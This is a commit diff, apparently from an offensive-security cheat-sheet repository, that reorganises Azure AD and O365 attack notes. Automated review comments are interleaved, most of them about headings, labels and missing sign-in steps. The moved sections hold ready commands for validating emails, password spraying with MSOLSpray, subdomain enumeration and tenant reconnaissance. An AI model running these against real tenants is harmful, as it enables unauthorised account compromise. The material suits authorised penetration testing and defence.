Enumerate Tenant Information

pull/2/head
Swissky 2023-11-26 12:44:03 +01:00
parent a432ae494e
commit f7bd9bb527
3 changed files with 95 additions and 110 deletions

View File

@ -4,12 +4,6 @@
* [Azure Recon Tools](#azure-recon-tools)
* [Enumeration](#enumeration)
* [Enumerate valid emails](#enumerate-valid-emails)
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
* [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell)
* [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell)
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
* [Enumerate manually](#enumerate-manually)
* [Enumeration methodology](#enumeration-methodology)
* [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell)
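Review bot: the header `@ -4,12 +4,6 @@` shows the table of contents shrinking by six entries, the ones running from `Enumerate valid emails` to `Enumerate manually`, with nothing put in their place; since the matching sections are moved out of this file in the next hunk rather than deleted, the TOC should gain one entry or link pointing at the file that now holds them, so readers of this page can still find the enumeration material.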
@ -197,96 +191,6 @@
## Enumeration
### Enumerate valid emails
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
```powershell
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
```
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
#### Password spraying
```powershell
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
```
### Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
```
### Enumerate tenant with Azure AD Powershell
```powershell
Import-Module C:\Tools\AzureAD\AzureAD.psd1
Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzureAD -Credential $creds
PS AzureAD> Get-AzureADUser -All $true
PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName
PS AzureAD> Get-AzureADGroup -All $true
PS AzureAD> Get-AzureADDevice
PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
```
### Enumerate tenant with Az Powershell
```powershell
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential ("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzAccount -Credential $creds
PS Az> Get-AzResource
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
```
### Enumerate tenant with az cli
```powershell
PS> az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
```
### Enumerate manually
* Federation with Azure AD or O365
```powershell
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
```
* Get the Tenant ID
```powershell
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
```
## Enumeration methodology
```powershell
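Review bot: the Azure AD Powershell, Az Powershell and az cli blocks removed here each open with a sign-in step (`Connect-AzureAD -Credential $creds`, `Connect-AzAccount -Credential $creds`, `az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>`), and the `Get-AzureADDevice` call from the Azure AD Powershell block has no counterpart in the sections added elsewhere in this commit; the `Enumerate Services` block that receives the `Get-Az*` and `az ... list` commands starts directly at `Get-AzResource` and `az vm list`, so either carry the sign-in lines and the device enumeration over, or state the authenticated-session prerequisite above the new block.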

View File

@ -8,9 +8,10 @@
## Users
```ps1
```
* List users: `Get-AzureADUser -All $true`
* Enumerate groups: `Get-AzureADGroup -All $true`
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
* Add user to a group
```ps1
$groupid = "<group-id>"
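Review bot: the empty fenced block (a ```` ```ps1 ```` line immediately followed by a closing ```` ``` ````) under `## Users` renders as a blank code box and should be removed or given content; in the same hunk the bullet labels do not match their commands: `Enumerate roles` runs `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`, which lists the members of the Global Administrator role, and `List roles` runs `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`, which lists only custom (non-built-in) role definitions, so labels such as `List Global Administrators` and `List custom roles` would describe them accurately.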
@ -20,6 +21,8 @@
New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
```
### Use Credentials
### Dynamic Group Membership
Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`
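Review bot: the `### Use Credentials` heading is inserted directly before `### Dynamic Group Membership` with no body of its own, so it will render as an empty section; either add the intended content under it or drop the heading until that content exists. In the same hunk, `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}` is called without `-All $true`, unlike the other `Get-AzureAD*` one-liners in this file, so on a tenant with more groups than one result page the filter will silently miss dynamic groups beyond the first page; `Get-AzureADMSGroup -All $true | ?{...}` avoids that.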

View File

@ -1,14 +1,5 @@
# Azure AD Enumerate
## OSINT AAD - Recon Domains
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Collectors
* roadrecon
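Review bot: the `## OSINT AAD - Recon Domains` section removed here (the aadinternals.com/osint link and the two `Invoke-AADIntReconAsOutsider` calls) reappears later in this commit under `## Azure Services Enumeration` as `### Enumerate Tenant Domains`, that is, after the user-enumeration and password-spraying material, although it needs no credentials and is the natural first step; consider keeping it at the top of the file, or folding it into the `Enumerate Tenant Informations` section, so the unauthenticated recon stays ahead of the authenticated steps.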
@ -23,7 +14,93 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
## Azure AD - Conditional Access Policy
## Azure AD - User Enumeration
### Enumerate Tenant Informations
* Federation with Azure AD or O365
```powershell
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
```
* Get the Tenant ID
```powershell
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
```
### Enumerate Email
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
```powershell
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
```
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
### Password Spraying
```powershell
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
```
## Azure Services Enumeration
### Enumerate Tenant Domains
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
### Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
```
### Enumerate Services
* Using Az Powershell module
```powershell
PS Az> Get-AzResource
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
```
* Using az cli
```powershell
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
```
## Conditional Access Policy
Conditional Access is used to restrict access to resources to compliant devices only.
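Review bot: the two `### Enumerate Services` blocks added here start at `Get-AzResource` and `az vm list` without the `Connect-AzAccount -Credential $creds` and `az login` steps that preceded the same commands in the file they were moved from, so add the sign-in lines or a one-line prerequisite above them. Smaller points in the same hunk: the two blocks under `### Enumerate Tenant Informations` hold bare URLs but are fenced as `powershell` (a plain fence, or wrapping the URL in `Invoke-WebRequest`, would be clearer), the heading itself should read `Enumerate Tenant Information`, the bullet `Extract email lists with a valid credentials` should read `with valid credentials`, and the trailing line `Conditional Access is used to restrict access to resources to compliant devices only` understates the feature, since policies can also be keyed on user, location, sign-in risk and authentication method; "based on conditions such as device compliance, location or sign-in risk" would be more accurate.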
@ -59,7 +136,8 @@ Join-AADIntDeviceToIntune -DeviceName "SixByFour"
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
## Azure AD - MFA
## Multi Factor Authentication
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
```ps1
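Review bot: `## Azure AD - MFA` and `## Multi Factor Authentication` appear as adjacent headings with the same meaning; if the second is the renamed replacement, make sure the first is actually removed rather than left behind as a duplicate, and spell the new one `Multi-Factor Authentication` so it matches the `MFA` abbreviation used in the dafthack/MFASweep bullet right below it.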